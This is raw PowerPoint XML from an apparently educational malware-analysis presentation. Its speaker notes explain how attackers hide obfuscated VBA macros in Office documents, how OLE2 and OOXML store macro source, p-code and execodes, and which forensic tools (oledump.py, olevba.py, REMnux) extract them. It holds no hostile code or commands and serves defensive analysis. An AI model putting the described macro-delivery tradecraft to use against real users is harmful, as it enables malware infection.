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8" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="1042" r:id="rId6"/>
    <p:sldId id="1160" r:id="rId7"/>
    <p:sldId id="1167" r:id="rId8"/>
    <p:sldId id="1171" r:id="rId9"/>
    <p:sldId id="1172" r:id="rId10"/>
    <p:sldId id="1185" r:id="rId11"/>
    <p:sldId id="1186" r:id="rId12"/>
    <p:sldId id="1173" r:id="rId13"/>
    <p:sldId id="1184" r:id="rId14"/>
    <p:sldId id="1174" r:id="rId15"/>
    <p:sldId id="1183" r:id="rId16"/>
    <p:sldId id="1175" r:id="rId17"/>
    <p:sldId id="1187" r:id="rId18"/>
    <p:sldId id="1188" r:id="rId19"/>
    <p:sldId id="1176" r:id="rId20"/>
    <p:sldId id="1178" r:id="rId21"/>
    <p:sldId id="1179" r:id="rId22"/>
    <p:sldId id="1180" r:id="rId23"/>
    <p:sldId id="1181" r:id="rId24"/>
    <p:sldId id="1169" r:id="rId25"/>
    <p:sldId id="1182" r:id="rId26"/>
    <p:sldId id="1190" r:id="rId27"/>
    <p:sldId id="1189" r:id="rId28"/>
    <p:sldId id="1193" r:id="rId29"/>
    <p:sldId id="1191" r:id="rId30"/>
    <p:sldId id="1192" r:id="rId31"/>
    <p:sldId id="1195" r:id="rId32"/>
    <p:sldId id="1197" r:id="rId33"/>
    <p:sldId id="1194" r:id="rId34"/>
    <p:sldId id="1196" r:id="rId35"/>
    <p:sldId id="1165" r:id="rId36"/>
    <p:sldId id="1060" r:id="rId37"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>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Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
      </a:defRPr>
    </a:lvl9pPr>
  </p:defaultTextStyle>
  <p:extLst>
    <p:ext uri="{521415D9-36F7-43E2-AB2F-B90AF26B5E84}">
      <p14:sectionLst xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <p14:section name="Part 1" id="{BA7DFC3B-967C-8A47-A999-E6A9B6DA7CF2}">
          <p14:sldIdLst>
            <p14:sldId id="265"/>
            <p14:sldId id="1042"/>
            <p14:sldId id="1160"/>
            <p14:sldId id="1167"/>
            <p14:sldId id="1171"/>
            <p14:sldId id="1172"/>
            <p14:sldId id="1185"/>
            <p14:sldId id="1186"/>
            <p14:sldId id="1173"/>
            <p14:sldId id="1184"/>
            <p14:sldId id="1174"/>
            <p14:sldId id="1183"/>
            <p14:sldId id="1175"/>
            <p14:sldId id="1187"/>
            <p14:sldId id="1188"/>
            <p14:sldId id="1176"/>
            <p14:sldId id="1178"/>
            <p14:sldId id="1179"/>
            <p14:sldId id="1180"/>
            <p14:sldId id="1181"/>
            <p14:sldId id="1169"/>
            <p14:sldId id="1182"/>
            <p14:sldId id="1190"/>
            <p14:sldId id="1189"/>
            <p14:sldId id="1193"/>
            <p14:sldId id="1191"/>
            <p14:sldId id="1192"/>
            <p14:sldId id="1195"/>
            <p14:sldId id="1197"/>
            <p14:sldId id="1194"/>
            <p14:sldId id="1196"/>
            <p14:sldId id="1165"/>
            <p14:sldId id="106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7" autoAdjust="0"/>
    <p:restoredTop sz="54047" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="2406" y="72"/>
      </p:cViewPr>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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3F7C3218-6286-4045-8084-7D8F4F6601BE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B276D228-A1C4-194E-BD76-E875F1B56BB0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707106969"/>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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8F2EB731-3767-4A47-A391-014B15B43827}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="533043458"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51998215-B6DA-6840-93A7-8744EF3D5C54}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37655752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The tools to analyze, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deobfuscate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> would be the same ones that are used to analyze VBScripts and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JScripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.  Between them:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Notepad++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer tools in browsers, chrome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42624885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The attackers use documents from the Microsoft Office suite (word, excel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powerôint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.) as cover for the transport stage of the malicious code because the exchange of this type of document by email is very common in corporate environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These documents allow the insertion of macros. Which are written in VBA language (Visual Basic for Applications) and have a high capacity for interaction with the operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers often schedule macros to run automatically when the victim opens the malicious document and clicks the application's warning button that allows the macros to run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers obfuscate VBA code, as an anti-forensic measure. The VBA macro engine does not support executing the content of embedded scripts as a string. Obfuscation technique that can be used in languages like VBScript (using execute) or JavaScript /using eval).</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5457300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Microsoft Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>documents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>support</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The legacy binary document format (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lagacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) OLE2 (Object Linking and Embedding 2) is also known as structured storage.  OLE2 is a single file entity, made up of two types of objects,  storage and streams, which act in practice as a directory and 	file structure. Office allows you to embed binary documents in OLE2 files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The OOXML file format is easier to parse and less vulnerable than OLE2. It is a ZIP file that serves as a wrapper for the different contents of the document. The macros contained in these files are stored inside an OLE2 binary file which is inside the ZIP file, the standard name is usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vbaProject.bin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OLE2 files support macros regardless of the document's nomenclature. On the other hand, for OOXML documents to support macros, the extension must contain the character "m" (for example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xlsm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pptm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dotm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes OLE2 files contain streams whose nomenclature begins with __SRP__ (Stream Reservation Protocol). In these streams, office applications store compiled copies of VBA macros after their execution. I explain this on the next slide.</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14472658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a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Macros written in VBA, used by office can exist in three different ways, depending on the scenario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source code. The original source code of the macro module is compressed and stored at the end of the module stream. This makes it easier for the malware analyst to locate and extract it with forensic tools such as oledump.py or olevba.py. Although the many times Office ignores this source code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P-Code. As each VBA line is entered into the VBA editor it is immediately compiled into p-code (pseudocode for a device stack) and stored in a different place in the module stream. Only if the document is opened in a version of Microsoft Office that used a different version of VBA will the stored source code be recompiled into p-code. Different versions of VBA use different and incompatible statements and structures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VBscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> virtual machine is stack oriented and consists of just over 100 instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Execodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. When the p-code has been executed at least once, a further tokenized form of it is stored in another part of the document. Example in streams, names start with __SRP__ followed by a number. From there they can be executed much faster.</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38716851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a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The olevba.py tool allows you to locate and extract the macros embedded in OOXML files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The oledump.py tool shows all the streams present in a suspicious document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other tools that allow you to parse the content of OLE2 documents are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>olecfinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, oledir.py, and olebrowse.py.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All these tools are present in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>REMnux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> distribution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Microsoft Windows we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MiTeC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Structured Storage Viewer tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And other tolls ….</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40669083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The MSG file format is the one associated with emails exported with the Microsoft Outlook email manager. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These are CFBF files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Compount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> File Binary Format).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This format allows you to store different files and streams within a single file on the storage medium. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This format is currently open to third parties.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CFBF works like a container with little restriction on what can be stored in it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It looks a lot like the FAT file system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSG files, being OLE documents, can be parsed with tools used to parse OLE objects embedded in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MIcrosoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Office documents, such as the free oledump.py with the additional plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>plugin_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>I have introduced this file format because I find it super interesting and super forgotten in order to be used with malicious content. I will study it later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
